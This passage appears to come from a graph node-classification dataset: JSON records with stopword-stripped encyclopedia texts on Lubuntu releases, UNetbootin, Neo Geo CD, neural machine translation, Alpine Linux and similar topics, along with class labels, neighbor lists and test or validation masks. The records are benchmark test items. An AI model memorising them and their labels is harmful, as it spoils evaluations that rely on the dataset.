wallpaper lubuntu 10.10 accepted official ubuntu derivative release point due lack integration infrastructure canonical ubuntu work continuing towards goal lubuntu 10.10 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages developer julien lavergne wrote 10.10 incorporated many changes 10.04 changes considered improvements improvements included new theme designed rafael laguna incorporation xpad note taking ace-of-penguins games lxtask lxde task manager place xfce application replacing epdfview pdf reader evince due memory leak problem removing pyneighborhood minuses included last-minute rewrite installer integrate properly resulted installation instability raising minimum installation ram 180 mb 256 mb issue incorporation ubuntu update manager increased ram usage 10 mb lubuntu 10.04 indication updates available deemed necessary minimum system requirements lubuntu 10.10 described mario behling comparable pentium ii celeron systems 128 mb ram configuration may yield slow yet usable system lubuntu chief developer julien lavergne stated minimum ram install lubuntu 10.10 256 mb reviewing lubuntu 10.10 right release october 2010 jim lynch eye linux said lubuntu ’ biggest appeal speed ’ disappointment area applications load open quickly overall experience lubuntu quite positive detected stability problems lubuntu 10.10 quite solid reliable entire time used lynch fault choice synaptic package manager one strange things lubuntu offers synaptic package manager xubuntu 10.10 hand offers ubuntu software center well synaptic ’ sure ubuntu software center missing lubuntu would make lot sense include since much easier attractive way manage software synaptic gets job done ’ less friendly new users ’ match ubuntu software center terms usability comfort mid-december 2010 lubuntu risen 11th place distrowatch six month list popular linux distributions 319 distributions right behind puppy linux well ahead xubuntu 36th place reviewing linux distribution rankings distrowatch early january 2011 year 2010 versus 2009 ladislav bodnár noted looking tables interesting thing rise distributions use lightweight full-featured lxde desktop openbox window manager example lubuntu comfortably beats kubuntu terms page hits ... project announced development schedule november 2010 lubuntu 11.04 released time 28 april 2011 lubuntu 11.04 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages unofficial 64-bit iso 11.04 also released kendall weaver peppermint os improvements lubuntu 11.04 included replacing aqualung audacious default music player elimination hardware abstraction layer introducing movable desktop icons ubuntu font used default improved menu translations reorganized menus release also introduced new default theme artwork designed raphael laguna known ozone partly based xubuntu ’ default bluebird theme lubuntu 11.04 run little 128 mb ram requires 256 mb ram install using graphical installer lubuntu 11.04 completed process official status member ubuntu family mario behling stated next goals project clear apart constantly improving distribution lubuntu project aims become official flavour ubuntu mark shuttleworth remarked lubuntu developers upon release 11.04 reviewing lubuntu 11.04 release joey sneddon omg ubuntu commented look lubuntu ’ 'traditional interface comfort agitated interface revolution heralded gnome 3 ubuntu unity certainly ’ appeal 'bling fans ’ say attention ’ paid appearance new default theme raphael laguna use ubuntu font helps give sometimes-basic-feeling os distinctly professional look subject official status sneddon said lubuntu long sought official sanction ubuntu project family classed official 'derivative ubuntu earning place alongside kubuntu xubuntu accomplished release lubuntu 11.04 hold acceptance remains disappointing expected review 12 may 2011 jim lynch desktop linux reviews faulted 11.04 using ubuntu software center lack alternative wallpapers use abiword place libreoffice praise lubuntu saying speed one nice things lubuntu even slow older system ’ usually quite fast ’ amazing achieve cut unnecessary eye-candy bloat also 12 may 2011 koen vervloesem writing linux user developer criticized applications bundled lubuntu saying software choices rather odd however instance chromium default web browser sensible move distro aimed low-end computers developers also ship firefox lubuntu shows web browsers internet menu also default screenshot program scrot command-line program shown accessories menu everyone find another odd choice install applications synaptic default lubuntu ’ ubuntu software center preferred software installation program ubuntu good releases minor inconveniences though since get access full ubuntu software repositories meaning install favourite applications blink eye one month release lubuntu 11.04 risen ninth place distrowatch 30-day list popular distributions lubuntu 11.10 first version lubuntu official sanction member ubuntu family part status change lubuntu 11.10 used latest ubuntu infrastructure iso files hosted ubuntu release include many new features work focused integration ubuntu instead 11.10 released 13 october 2011 day ubuntu 11.10 released september 2011 announced work lubuntu software center progressing ubuntu software center resource intensive lubuntu lubuntu using less user-friendly synaptic package manager recent releases development new lightweight application manager lubuntu intended rectify problem although users course install ubuntu software center using synaptic changes lubuntu 11.10 include built ubuntu official build system using current packages default alternative install 64-bit isos provided use xfce4-power-manager new microblog client pidgin-microblog new theme rafael laguna lubuntu 11.10 requires minimum 128 mb ram run 256 mb ram install graphic installer recommended minimum ram run live cd session 384 mb lubuntu 11.10 iso file contains known issue causes fail load live cd session hardware instead loading command prompt users required enter codice_1 prompt run live cd session review lubuntu 11.10 pc mech writer rich menga described simple rock-solid reliable trustworthy added ubuntu point suffering major bloat interface side things even say xubuntu point – lubuntu gets back great linux distro end october 2011 lubuntu risen seventh place distrowatch one month popularity list review linux user developer november 2011 russell barnes praised lubuntu 11.10 low system hardware requirements providing alternative gnome kde saying aesthetic appeal functionality minimally compromised effort sleek light possible barnes noted mark shuttleworth may wise offer full status lubuntu release given fuss bluster surrounding unity aesthetics stated trademark pale blue desktop almost hypnotic ’ incredibly clean clear logically laid – user experience million miles away ubuntu 11.10 ’ unity gnome shell counterparts comparison ’ almost cleansing nature simplicity barnes rated 4/5 concluded ’ flexible pretty gnome 2 lubuntu 11.10 certainly got everything need keep computer happy desktop clean clutter-free igor ljubuncic dedoimedo said lubuntu 11.10 lubuntu meant offer valid alternative heavier kde unity flavors tries bravely fails heroically advantage somewhat reduced system resource usage triply negatively compensated drawbacks desktop environment well incomplete integration samba-related crashes laptop hotkeys jumbled system tray icons low battery life want really mean could add lack customization average software arsenal dozen smaller things get way ... lubuntu could work exciting spectacular way packages handsome bag problems easily avoid using main release ... would recommend edition ... grade 6/10 lubuntu 12.04 released 26 april 2012 planning release took place ubuntu developer summit held early november 2011 changes planned time release included use lightdm x display manager blueman instead gnome-bluetooth managing bluetooth devices lubuntu software center added release provide user-friendly graphical interface managing applications synaptic package manager still installed default allows users manage packages system gdebi allows installation downloaded .deb packages lubuntu 12.04 released linux v3.2.14 linux kernel also introduced large number bug fixes particularly lx panel pcmanfm file manager ubuntu backports repository enabled default meaning backport packages installed default installed automatically upgraded newer versions lubuntu 12.10 released 18 october 2012 includes new version session manager customization integration options also includes new version pcman file manager external thumbnail support version new artwork including new wallpaper new icon set entitled box adjusted gtk themes notification-daemon replaced xfce4-notifyd default installation previous versions lubuntu gui search function catfish search utility added default installation version lubuntu uses linux kernel 3.5.5 python 3.2 openjdk7 default java implementation installation requires cpu physical address extensions pae indicates intel pentium pro newer cpu except 400 mhz-bus versions pentium m. case powerpcs tested powerpc g4 running 867 mhz 640 mb ram also run intel-based apple macs also version supports arm architecture developers currently provide installation instructions one arm-based device toshiba ac100 netbook release lubuntu support uefi secure boot unlike ubuntu 12.10 would allowed run hardware designed windows 8 lubuntu 12.10 could run uefi secure boot hardware turning secure boot feature lubuntu 13.04 released 25 april 2013 version incorporated minor changes lubuntu 12.10 including new version pcmanfm file manager incorporates built-in search utility due particular file manager update catfish search utility longer required deleted lubuntu 13.04 also introduced artwork improvements new wallpaper offerings new icons new installation slideshow minimum system requirements lubuntu 13.04 pentium ii celeron cpu pae support 128 mb ram least 2 gb hard-drive space release also still supports powerpc architecture requiring g4 867 mhz processor 640 mb ram minimum julien lavergne announced june 2013 lubuntu 13.10 would ship firefox default browser place chromium release also used lightdm screen locking included zram reviewing beta release september 2013 joey sneddon omg ubuntu said lubuntu never looked good latest beta noted new box icon theme expanded progress bar colours softened window controls enlarged along sharpened start button final release incorporated minor changes 13.04 included new version pcmanfm includes file search function allowed catfish desktop search removed also new artwork included bug fixes gnome-mplayer gpicview image viewer reviewing lubuntu 13.10 jim lynch said sometimes less much much comes linux distributions lubuntu 13.10 offers advantages ubuntu much minimalist package tentative plans announced april 2013 make lubuntu 14.04 long term support release november 2013 confirmed 14.04 would first lubuntu lts release three years support release also saw xscreensaver replaced light-locker screen lock released 17 april 2014 lubuntu 14.04 included minor updates version 13.10 along featured file manager download media lubuntu 14.04 available pc 32 bit pc 64 bit mac intel 64 bit mac powerpc early intel macs 32 bit core solo processor 32-bit pc image available reviewing lubuntu 14.04 lts silviu stahie softpedia noted uses similar layout one found old defunct windows xp os considered good appropriate replacement microsoft operating system 1 june 2014 jim lynch reviewed lubuntu 14.04 lts concluded lubuntu 14.04 lts performed well fast quite stable using problems running applications system whole lived reputation great choice ubuntu minimalists ... lxde desktop environment different unity ubuntu gnome 3 ubuntu gnome ’ traditional desktop means ’ quick easy learn use someone ’ like unity gnome lxde lubuntu 14.04 lts might doctor ordered ’ get benefits ubuntu without discomfort unity interface release 23 october 2014 originally intended feature version lxde based upon qt toolkit called lxqt development latter delayed feature implemented time lubuntu 14.10 incorporated general bug fixes preparation implementation lxqt updated lxde components new artwork including icons theme update silviu stahie writing softpedia stated one main characteristics lubuntu fact fast even older computers basically lubuntu able run anything built last decade operating systems claim thing ... like ubuntu base lubuntu 14.10 seen important visual modifications although many packages updated hood theme icons updated developers preparing make switch lxqt project still works igor ljubuncic dedoimedo said lubuntu 14.10 nothing functionally wrong lubuntu bad simply interesting meat without flavor hybrid car accounting lessons local evening school morning news visit pompei blindfolded excitement ... liked desktop environment past stagnated n't evolved competitors left far behind reflects poorly lubuntu despite calm stable record spartan behavior left absolute zero emotional attachment toward released 23 april 2015 lubuntu 15.04 consisted primarily bug fixes project prepared planned switch lxqt lubuntu 15.10 lubuntu box theme updated merged ubuntu light theme incorporate recent gtk+ features including new header bars gnome native applications plus improved artwork icons minimum system requirements release include 512 mb ram 1 gb recommended plus pentium 4 pentium amd k8 processor release notes indicated graphics cards nvidia amd/ati/radeon intel work box marius nestor softpedia noted ... lubuntu 15.04 operating system comes updated artwork includes updated theme beautiful icons updated gtk+ infrastructure better compatibility qt applications released 22 october 2015 lubuntu 15.10 originally planned move lxqt qt libraries place gtk+ libraries used lxde june 2015 delayed future release release ended minor bug fix application version update changes versions included new artwork ibus replaced fcitx allowing fonts chinese japanese korean included lubuntu-extra-sessions optional instead default minimum system requirements release stated advanced internet services like google+ youtube google docs facebook computer needs 1 gb ram local programs like libre office simple browsing habits computer needs 512 mb ram ... minimum specification cpu pentium 4 pentium amd k8 older processors slow amd k7 problems flash video ... nvidia amd/ati/radeon intel work box system tweaked work fairly easily joey sneddon omg ubuntu humorously noted lubuntu 15.10 another highly minor bug fix release released 21 april 2016 lubuntu 16.04 long term support lts version supported three years april 2019 second lubuntu lts version preceded 14.04 april 2014 release retains lxde desktop make transition lxqt allow lxqt better tested later non-lts releases release large file fit cd requires dvd usb flash drive installation lubuntu 16.04 lts primarily bug-fix release includes new features updated artwork however system requirements include 512 mb ram 1 gb recommended pentium 4 pentium amd k8 newer cpu first point release 16.04.1 released 21 july 2016 release lubuntu 16.04.2 delayed number times eventually released 17 february 2017 lubuntu 16.04.3 released 3 august 2017 lubuntu 16.04.4 delayed 15 february 2018 released 1 march 2018 lubuntu 16.04.5 released 2 august 2018 8 march 2017 new version firefox 52.0 arrived update process version removed alsa audio support firefox favour pulseaudio something initially mentioned mozilla release notes since lubuntu 16.04 lts shipped alsa audio broke default lubuntu audio system default lubuntu browser response bug filed mozilla developers declined fix issue lubuntu 16.10 released 13 october 2016 uses lxde lxqt implementation lxqt delayed release 17.04 release also features small bug fixes updated lxde components updated artwork particularly wallpaper developers recommended system requirements release advanced internet services like google+ youtube google drive facebook computer needs least 1 gb ram local programs like libreoffice simple browsing habits computer needs least 512 mb ram minimum specification cpu pentium 4 pentium amd k8 older processors slow amd k7 problems flash video joey sneddon omg ubuntu noted new features lubuntu 16.10 longer uses lubuntu software centre switched gnome software ubuntu also sneddon wrote lubuntu 16.10 largely lubuntu 16.04 lts work switching lxqt desktop — expected next release — continues july 2016 article sneddon singled new wallpaper design lubuntu 16.10 saying jaggedy geometric layout new backdrop stands one visually distinct ship recent years marius nestor softpedia wrote appears lot known issues release 're using lubuntu 16.04 lts xenial xerus n't recommend upgrading lubuntu 16.10 least read attempting upgrade operation lubuntu 17.04 released 13 april 2017 like previous releases uses lxde lxqt implementation lxqt lubuntu delayed time 17.10 release incorporated linux kernel 4.10 updated lxde components general bug fixes new artwork recommended system requirements included 1 gb ram 512 mb minimum minimum pentium 4 pentium amd k8 processor joey sneddon omg ubuntu said release compromised mainly bug fixes core app system updates rather screenshot-able new features lubuntu 17.10 released 19 october 2017 release general bug fix release project prepares implementation lxqt also included new versions lxde components new artwork minimum system requirements release remained 512 mb ram 1 gb recommended least pentium 4 pentium amd k8 processor alternate version entitled lubuntu next 17.10 provided lxqt 0.11.1 desktop release available install ... recommend people use production unless aware somewhat critical bugs associated 10 point writing also ’ bad idea contact us well wrote lubuntu developer simon quigley lubuntu 18.04 long term support version released 26 april 2018 last release lubuntu use lxde desktop 18.10 moved using lxqt like past releases 18.04 lts used lxde desktop although work continued move towards deployment lxqt desktop referred lubuntu next release included new artwork including new star field wallpaper system requirements lubuntu 18.04 lts included minimum 1 gb ram although 2 gb recommended better performance plus pentium 4 pentium amd k8 cpu newer ram requirements increased lubuntu 17.10 point releases include 18.04.1 26 july 2018 18.04.2 14 february 2019 14 may 2018 announcement project developers confirmed lubuntu would transition lxqt desktop lubuntu 18.10 released 18 october 2018 included lxqt transition planned release lubuntu 18.04 lts allow testing development three regular releases first long term support version lubuntu 20.04 lts released lxqt project also changed logo early april 2018 anticipation move transitioning lxqt release uses lxqt 0.13.0 based upon qt 5.11.1 applications include libreoffice 6.1.1 office suite vlc media player 3.0.4 player discover software center 5.13.5 featherpad 0.9.0 text editor kde falkon 3.0.1 beta tested default web browser found lack stability replaced firefox 63.0 installer 18.10 calamares system installer place previous ubiquity installer starting release developers longer make recommendations minimum system requirements reviewing beta version 18.10 may 2018 marius nestor softpedia wrote took first lubuntu 18.10 daily build lxqt test drive say 're impressed ... layout simple yet stylish sleek dark theme default single panel bottom screen access everything need ... give five-star rating writing official release 20 october 2018 marius nestor softpedia noted many trials tribulations lot hard work lubuntu team finally managed ship release lxqt desktop environment default instead lxde lightweight x11 desktop environment used default lubuntu releases beginning project also believe lxqt future lxde desktop environment uses old soon deprecated technologies welcome lubuntu 18.10 cosmic cuttlefish shiny lxqt 0.13.0 desktop environment default built latest qt 5.11.1 libraries patched upstream improvements reviewing lubuntu 18.10 distrowatch jesse smith wrote mixed feelings release lubuntu one hand features worked well distribution easy install liked theme operating system pretty easy use aspects n't like usually programs settings modules felt overly complex confusing compared counterparts distributions part though lubuntu nice job capable relatively lightweight distribution ... whole think transition lxde lxqt gone smoothly choices n't like mostly changes minor think people able make leap two desktops fairly easily think settings modules still need polish 'd like see discover replaced modern software manager otherwise felt like graceful mostly positive move 18.04 18.10 lxde lxqt detailed review lubuntu 18.10 mahmudin asharin writing ubuntu buzz found faults release particular network manager concluded users recommend lubuntu 18.04 lts instead sake usability support duration first timer installed/want install 18.10 lxqt go ahead get beautiful user interface nice experience recommend use wicd instead default network manager lxqt desktop pursuer lubuntu 18.10 great example lxqt system try first review full circle magazine noted overall lxqt seen lubuntu 18.10 ready day-to-day use also still room ongoing refinement.introducing lxqt lubuntu 18.10 careful choice lubuntu developers coming right lubuntu 18.04 lts final lxde release gives developers three standard releases continue polish lxqt first lts release ... standard release made schedule 18 april 2019 release marked first lubuntu version without 32-bit support lubuntu developer simon quigley wrote december 2018 release featured lxqt 0.14.1 based upon qt 5.12.2 included working full-disk encryption easier customization calamares installer configurations employing xdg configuration variables austrian keymapping minimum installation ram reduced 500 mb changes include trash home computer network icons added desktop split view pcmanfm-qt exif data display image viewer lximage-qt touchpad settings fixed 18.10 review softpedia writer marius nestor described use lxqt 0.14.1 employed lubuntu 19.04 much-improved richer lxqt experience review full circle magazine concluded lubuntu 18.10 ’ ready prime time 19.04 lxqt looks fresh new everything works right installation even runs fine dvd live session ’ find anything needs fixing 19.04 nine month support period regular release could long term support release least quality user experience lack bugs standard release last one next lts release expected 17 october 2019 standard release expected october 2020 16 august 2018 lubuntu development team announced plans port openbox mir time lubuntu 20.10 allow lubuntu move away x display server implementation wayland instead lxde versions lubuntu 18.04 lts earlier included following applications user applications lxde including 18.04 lts lubuntu also access ubuntu software repositories lubuntu software center synaptic package manager apt allowing installation applications available ubuntu lxqt versions lubuntu 18.10 later include following applications internet applications office applications graphics applications accessories sound video 18.10 lubuntu also access ubuntu software repositories discover software center synaptic package manager apt allowing installation applications available ubuntu",
    "neighbors": [
      4611,
      3079,
      6151,
      10255,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      546,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      10308,
      3654,
      5190,
      3147,
      1101,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      10851,
      3685,
      9320,
      9324,
      10860,
      5742,
      2671,
      3189,
      5755,
      11388,
      1150,
      8322,
      2692,
      8837,
      11396,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      3744,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      708,
      2763,
      8907,
      8909,
      3791,
      6352,
      7385,
      11481,
      10971,
      5343,
      6371,
      4841,
      6890,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9971,
      9461,
      1782,
      5369,
      6393,
      8957,
      7938,
      4355,
      5380,
      7435,
      2321,
      6934,
      4887,
      8476,
      1822,
      8992,
      10016,
      5410,
      10530,
      6436,
      2853,
      3369,
      6445,
      2864,
      823,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      5962,
      4951,
      9048,
      8033,
      2914,
      5990,
      9064,
      4459,
      7020,
      7534,
      11121,
      2930,
      9074,
      1396,
      8573,
      11648,
      3969,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      3478,
      10646,
      926,
      9119,
      10149,
      8102,
      6055,
      7082,
      8621,
      1455,
      8112,
      948,
      439,
      10687,
      10694,
      4039,
      975,
      8147,
      5078,
      9689,
      2010,
      9693,
      3550,
      6625,
      7140,
      485,
      495,
      8177,
      8180,
      5110,
      8700,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 7914,
    "label": 2,
    "text": "UNetbootin:unetbootin unetbootin universal netboot installer cross-platform utility create live usb systems load variety system utilities install various linux distributions operating systems without cd installation mode creates bootable usb flash drives bootable usb hard disk drives live usb creator multiple installs device supported installation mode performs network installation frugal install without cd similar performed win32-loader unetbootin distinguishing features support great variety linux distributions portability ability load custom disk image including iso image files support windows linux unlike wubi similar win32-loader installing hard disk unetbootin installs partition disk image thus creating dual-boot setup linux windows",
    "neighbors": [
      8513,
      9377,
      292,
      6436,
      10149,
      3815,
      6797,
      7983,
      5618,
      823,
      6012,
      4637
    ],
    "mask": "Test"
  },
  {
    "node_id": 7915,
    "label": 8,
    "text": "Broadjam:broadjam broadjam us-based music community website founded september 1999 service aimed primarily independent musicians users interact artists enter contests collaborate peers email reviews blogs social networking tools broadjam also works related industries provide various licensing opportunities including placement films tv shows advertising campaigns video games radio play professional reviews broadjam claims one world largest web communities catering independent musicians site online database 500,000 searchable songs home approximately 110,000 artists world company founded roy elkins assistance stephanie essex elkins former corporate sales marketing executive classical singer classical music radio deejay intention provide promotional services unsigned musicians company based madison wisconsin roy formerly vice president sales marketing sonic foundry prior roy training director ensoniq corporation broadjam offers variety services artists gain exposure feedback musicians make bulk site membership broadjam also offers template-based hosting services help members create website broadjam founded 1999 site initially launched 2000 broadjam originally headquartered new glarus wisconsin relocated 2003 madison wisconsin site originally developed provide services independent musicians hoping get foot door music industry time service evolved provides wide range services artists music industry professionals broadjam holds variety sponsored contests aim expose reward exceptional musicianship songwriting broadjam hosts song month contests every month artist reviews scoring system based good better best used determine winner members submit songs radio play professional reviews placement films tv shows commercials video games music supervisors film television utilize broadjam provide music feature films tv shows commercials members give another feedback reviewing mechanism review songs specific genre random songs entire site highest rated songs appear broadjam top 10s broadjam 200 different top 10 charts sortable genre region production style reviewer demographics broadjam calculates top 10s daily based factors include song plays downloads reviews star ratings broadjam offers site hosting services premium members artists host existing sites create one using templates artists mark songs download mp3 file format members browse broadjam library genre region production based fan picks part professional services group broadjam provides online mechanism tallies votes popular music award ceremonies current customers service include academy country music madison area music awards broadjam also provides music encoding service major record labels use service encode catalog control metadata",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7916,
    "label": 3,
    "text": "Neo_Geo_CD:neo geo cd march 1997 570,000 neo geo cd units sold worldwide neo geo cd first unveiled 1994 tokyo toy show console uses cpu set-up arcade cartridge-based neo geo systems facilitating conversions snk planned release neo geo cd versions every neo geo game still arcades three versions neo geo cd released front-loading version original console design top-loading version developed shortly neo geo cd launch scaled-down cheaper alternative model cdz released december 29 1995 japanese market replacement snk previous efforts front loader top loader neo geo cd met limited success due plagued slow loading times could vary 30 60 seconds loads depending game response criticism neo geo cd long load times snk planned produce model double speed cd-rom drive north america compared single speed drive japanese european models however system missed planned north american launch date october 1995 snk declined give specific reason delay announcement new january 1996 launch date stated decided using double speed drive japanese division produced excess number single speed units found modifying units double speed expensive initially thought snk opted sell postponing production double speed model sold stock single speed units cdz officially sold japan production however faster loading times lack region lock fact could play older cd software made popular import item enthusiasts europe north america system technical specs identical previous models except includes double-speed cd-rom drive response reader inquiries neo geo cd software gamepro reported issue cover dated may 1997 snk quietly discontinued console time criticism system generally long loading times began even launch report electronic gaming monthly neo geo cd unveiling noted show showing demo fatal fury 2 prototype machine showed single speed load time 14-28 seconds rounds see screen shot right load screen approximately one month launch snk reported sold neo geo cd entire initial shipment 50,000 units reviewing neo geo cd late 1995 next generation noted snk reputation fun games argued failure upgrade neo geo system 3d capabilities would keep producing truly cutting edge games limit console small cult following neo geo aes system although less expensive games gave 1 1/2 5 stars system also capable reading redbook standard compact disc audio addition multi-av port nearly identical one used sega genesis model 1 though interchangeable neo geo cd models composite rca a/v s-video jacks rear console cd system 56 mbit 7 mb ram split accordingly neo geo cd library consists primarily ports mvs aes titles mvs arcade games officially released neo geo aes ported instead neo geo cd include puzzle bobble janshin densetsu quest jongmaster mahjong game also released pc engine power spikes ii neo drift new technology futsal 5-on-5 mini soccer games unreleased mvs aes formats also released exclusively neo geo cd include ironclad tesshō rusha chōtetsu burikingā brikin'ger crossed swords ii zintrick oshidashi zintorikku adk world neo geo cd special king fighters '96 neo collection samurai shodown rpg shinsetsu samurai spirits bushidō retsuden rpg spin-off samurai shodown series also released sony playstation sega saturn idol-mahjong final romance 2 arcade game mvs game ported directly neo geo cd",
    "neighbors": [
      8355,
      9091,
      7269,
      10855,
      5736,
      8937,
      10316,
      1776,
      4690,
      8917,
      1624,
      921,
      986,
      3256
    ],
    "mask": "Test"
  },
  {
    "node_id": 7917,
    "label": 5,
    "text": "Streamtuner:streamtuner streamtuner streaming media directory browser use c/python plugin system offers gtk+ 2.0 interface internet radio directories streamtuner actually play files downloads list online radio streams tells unix player user option play selected stream streamtuner offers hundreds thousands music resources common interface streamtuner free software released terms revised bsd license also version nokia 770 internet tablet",
    "neighbors": [
      8554,
      5397,
      10270,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7918,
    "label": 0,
    "text": "Neural_machine_translation:neural machine translation neural machine translation nmt approach machine translation uses large artificial neural network predict likelihood sequence words typically modeling entire sentences single integrated model require fraction memory needed traditional statistical machine translation smt models furthermore unlike conventional translation systems parts neural translation model trained jointly end-to-end maximize translation performance deep learning applications appeared first speech recognition 1990s first scientific paper using neural networks machine translation appeared 2014 followed lot advances following years large-vocabulary nmt application image captioning subword-nmt multilingual nmt multi-source nmt character-dec nmt zero-resource nmt google fully character-nmt zero-shot nmt 2017 2015 first appearance nmt system public machine translation competition openmt'15 wmt'15 also first time nmt contender following year already 90 nmt systems among winners popularity nmt also owes events introducing nmt section nmt neural mt training annual wmt workshop machine translation first independent workshop nmt google continued afterwards year nmt departs phrase-based statistical approaches use separately engineered subcomponents neural machine translation nmt drastic step beyond traditionally done statistical machine translation smt main departure use vector representations embeddings continuous space representations words internal states structure models simpler phrase-based models separate language model translation model reordering model single sequence model predicts one word time however sequence prediction conditioned entire source sentence entire already produced target sequence nmt models use deep learning representation learning word sequence modeling first typically done using recurrent neural network rnn bidirectional recurrent neural network known encoder used neural network encode source sentence second rnn known decoder used predict words target language convolutional neural networks convnets principle somewhat better long continuous sequences initially used due several weaknesses successfully compensated 2017 using so-called attention -based approaches coverage models addressing issues traditional attention mechanism ignoring past alignment information leading over-translation under-translation 2016 best mt systems using neural networks google microsoft yandex promt translation services use nmt google uses google neural machine translation gnmt preference previous statistical methods microsoft uses similar technology speech translations including microsoft translator live skype translator open source neural machine translation system opennmt released harvard nlp group different linguistic knowledges different language families borrowed idea traditional statistical machine translation smt researchers focus one specific language pairs introducing linguistic knowledge nmt work apply chinese radicals reflecting meaning upper-level composed character sub-character level chinese-english nmt address rare word out-of-vocabulary translation issue",
    "neighbors": [
      5122,
      2440,
      2059,
      3085,
      6798,
      11538,
      1044,
      538,
      9645,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      7780,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7919,
    "label": 9,
    "text": "Ch_(computer_programming):ch computer programming ch proprietary cross-platform c c++ interpreter scripting language environment originally designed harry h. cheng scripting language beginners learn mathematics computing numerical analysis numeric methods programming c/c++ ch developed marketed softintegration inc. student edition freely available ch professional edition raspberry pi free non-commercial use ch embedded c/c++ application programs numerical computing graphical plotting features ch combined shell ide ch shell combines features common shell c language chide provides quick code navigation symbolic debugging based embedded ch scite scintilla ch written c runs windows linux macos freebsd aix solaris qnx hp-ux supports c90 major c99 features support full set c++ features c99 complex number ieee-754 floating-point arithmetic variable-length array features supported ch became part c99 standard article published computer reseller news crn named ch notable among c-based virtual machines functionality availability third-party libraries ch many toolkits extend functions example ch mechanism toolkit used design analysis commonly used mechanisms fourbar linkage five-bar linkage six-bar linkage crank-slider mechanism cam-follower system ch control system toolkit used modeling design analysis continuous-time discrete-time linear time invariant lti control systems toolkits includes source code ch used integrated curriculum many high schools universities teach computing programming c/c++ ch integrated free c-stem studio platform learning computing science technology engineering mathematics c-stem robotics c-stem studio developed uc davis center integrated computing stem education c-stem offers curriculum k-12 students ch supports lego mindstorms nxt ev3 arduino linkbot finch robot robotalk raspberry pi pi zero arm robot programming learning also embedded labview system-design platform development environment ch supports 1999 iso c standard c99 c++ classes superset c c++ classes several major features c99 supported complex numbers variable length arrays vlas ieee-754 floating-point arithmetic generic mathematical functions specification wide characters addendum 1 c90 also supported c++ features available ch include ch supports classes c++ added abilities including ch interact existing c/c++ libraries call c/c++ functions ch script c/c++ interpreter ch used scripting engine extension language applications pointers arrays variables passed shared c-compiled ch scripting contexts one example embedded ch scripting application mobile-c used collaborative visualization distributed mesh model ch built-in string type string_t automatic memory allocation de-allocation supports shell aliases history piping etc ch built-in 2d/3d graphical plotting features computational arrays numerical computing 2d linear equation form b a*x written verbatim ch",
    "neighbors": [
      2181,
      4267,
      5612,
      823,
      6797,
      7341,
      7983,
      9714,
      499,
      5588,
      9780,
      10964,
      1399,
      1304,
      1849,
      219,
      2045,
      7646
    ],
    "mask": "Test"
  },
  {
    "node_id": 7920,
    "label": 3,
    "text": "Alpine_Linux:alpine linux alpine linux linux distribution based musl busybox designed security simplicity resource efficiency uses hardened kernel compiles user space binaries position-independent executables stack-smashing protection small size heavily used containers providing quick boot times postmarketos project designed run mobile devices based alpine linux originally alpine linux began fork leaf project members leaf wanted continue making linux distribution could fit single floppy disk whereas alpine linux wished include heavyweight packages squid samba well additional security features newer kernel one original goals create framework larger systems although usable purpose longer primary goal",
    "neighbors": [
      4611,
      516,
      3079,
      10760,
      7181,
      3089,
      4113,
      8209,
      8727,
      6680,
      10780,
      543,
      11297,
      3618,
      7204,
      9253,
      5670,
      11305,
      56,
      4153,
      3129,
      59,
      8248,
      9276,
      3649,
      4673,
      10817,
      3654,
      5190,
      3147,
      2125,
      1107,
      6227,
      2645,
      1110,
      89,
      5721,
      4192,
      3685,
      9324,
      10860,
      5742,
      2671,
      6257,
      1138,
      11388,
      2692,
      7812,
      8326,
      8837,
      9353,
      9873,
      11410,
      2195,
      8857,
      10394,
      6301,
      1694,
      5279,
      10397,
      673,
      3745,
      2723,
      1700,
      7332,
      7845,
      4775,
      7847,
      10920,
      9899,
      6828,
      3245,
      7854,
      7857,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      2259,
      7385,
      11481,
      1761,
      4841,
      6890,
      7913,
      5356,
      6380,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      7938,
      4355,
      11525,
      2310,
      4360,
      7435,
      7947,
      2321,
      1813,
      6934,
      4887,
      1820,
      8476,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      6446,
      1842,
      823,
      2872,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      4951,
      9048,
      9564,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      10096,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      2955,
      4493,
      10127,
      912,
      2448,
      11155,
      11669,
      10646,
      926,
      9119,
      11680,
      10149,
      6055,
      7082,
      4011,
      9646,
      1455,
      8115,
      948,
      11188,
      439,
      6583,
      9660,
      10172,
      1474,
      10694,
      4039,
      9671,
      5067,
      975,
      8147,
      5078,
      9689,
      2010,
      9693,
      7140,
      485,
      5096,
      495,
      8177,
      1522,
      499,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 7921,
    "label": 7,
